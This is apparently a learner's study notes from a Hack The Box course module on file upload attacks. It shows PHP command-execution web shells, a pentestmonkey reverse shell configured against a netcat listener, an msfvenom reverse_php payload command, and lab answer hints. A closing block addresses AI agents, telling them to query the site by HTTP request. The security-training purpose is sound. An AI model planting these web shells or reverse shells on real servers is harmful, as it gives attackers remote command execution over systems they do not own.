# Basic Explotaition

## Absent Validation

When the web application `does not have any form of validation filters` on the uploaded files, allowing the upload of any file type by default.

### Arbitrary File Upload

We can drag and drop any file we want, and its name will appear on the upload form, including `.php` files -->

<figure><img src="/files/lj136xGlf1dgGubeESjy" alt=""><figcaption></figcaption></figure>

***

### Identifying Web Framework

One easy method to determine what language runs the web application is to visit the `/index.ext` page, where we would swap out `ext` with various common web extensions, like `php`, `asp`, `aspx`, among others, to see whether any of them exist.

For example, when we visit our exercise below, we see its URL as `http://SERVER_IP:PORT/`, as the `index` page is usually hidden by default. But, if we try visiting `http://SERVER_IP:PORT/index.php`, we would get the same page, which means that this is indeed a `PHP` web application

We do not need to do this manually, of course, as we can use a tool like Burp Intruder for fuzzing the file extension using a [Web Extensions](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt) wordlist, as we will see in upcoming sections.

{% embed url="<https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt>" %}

<figure><img src="/files/uN2DUbpW2xrA4Lhc7h2w" alt=""><figcaption></figcaption></figure>

***

### Vulnerability Identification

As an initial test to identify whether we can upload arbitrary `PHP` files, let's create a basic `Hello World` script to test whether we can execute `PHP` code with our uploaded file.

To do so, we will write `<?php echo "Hello HTB";?>` to `test.php`, and try uploading it to the web application:

<figure><img src="/files/1Cin9iybk44WfnBOefeG" alt=""><figcaption></figcaption></figure>

***

### PoCs - Questions

* Try to upload a PHP script that executes the (hostname) command on the back-end server, and submit the first word of it as the answer.

```
## Create a php file and upload, example: hsh.php
<?php system('hostname'); ?>
```

***

## Upload Exploitation

### Web Shells

One good option for `PHP` is [phpbash](https://github.com/Arrexel/phpbash), which provides a terminal-like, semi-interactive web shell. Furthermore, [SecLists](https://github.com/danielmiessler/SecLists/tree/master/Web-Shells) provides a plethora of web shells for different frameworks and languages

Let's try to upload `phpbash.php` from [phpbash](https://github.com/Arrexel/phpbash) to our web application, and then navigate to its link by clicking on the Download button:

<figure><img src="/files/JN41leBN4ctJ3OXgj2Py" alt=""><figcaption></figcaption></figure>

### Writing Custom Web Shell

For example, with `PHP` web applications, we can use the `system()` function that executes system commands and prints their output, and pass it the `cmd` parameter with `$_REQUEST['cmd']`, as follows:

```php
<?php system($_REQUEST['cmd']); ?>
## or
<?php system($_GET['cmd']); ?>
```

<figure><img src="/files/tfzITetuscpYqVpdbDqV" alt=""><figcaption></figcaption></figure>

***

### Reverse Shell

Let's download one of the above reverse shell scripts, like the [pentestmonkey](https://github.com/pentestmonkey/php-reverse-shell), and then open it in a text editor to input our `IP` and listening `PORT`, which the script will connect to. For the `pentestmonkey` script, we can modify lines `49` and `50` and input our machine's IP/PORT:

{% embed url="<https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php>" %}

```php
## In the file chahge this
$ip = 'OUR_IP';     // CHANGE THIS
$port = OUR_PORT;   // CHANGE THIS
## On our machine
eldeim@htb[/htb]$ nc -lvnp OUR_PORT
listening on [any] OUR_PORT ...
connect to [OUR_IP] from (UNKNOWN) [188.166.173.208] 35232
> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

***

### Generating Custom Reverse Shell Scripts

Tools like `msfvenom` can generate a reverse shell script in many languages and may even attempt to bypass certain restrictions in place. We can do so as follows for `PHP`

```shell-session
eldeim@htb[/htb]$ msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
...SNIP...
Payload size: 3033 bytes
###########################################
eldeim@htb[/htb]$ nc -lvnp OUR_PORT
listening on [any] OUR_PORT ...
connect to [OUR_IP] from (UNKNOWN) [181.151.182.286] 56232
# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

***

### PoCs - Questions

* Try to exploit the upload feature to upload a web shell and get the content of /flag.txt

> We can upload a basic REQUEST web shell or a phpbash shell -->

```
<?php system($_GET['cmd']); ?> ## ws.php
## or
phpbash.php ## Download of github
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://eldeim.gitbook.io/brain_fuck/notes/certifications/eastereggs/htb-cbbh/file-upload-attacks/basic-explotaition.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.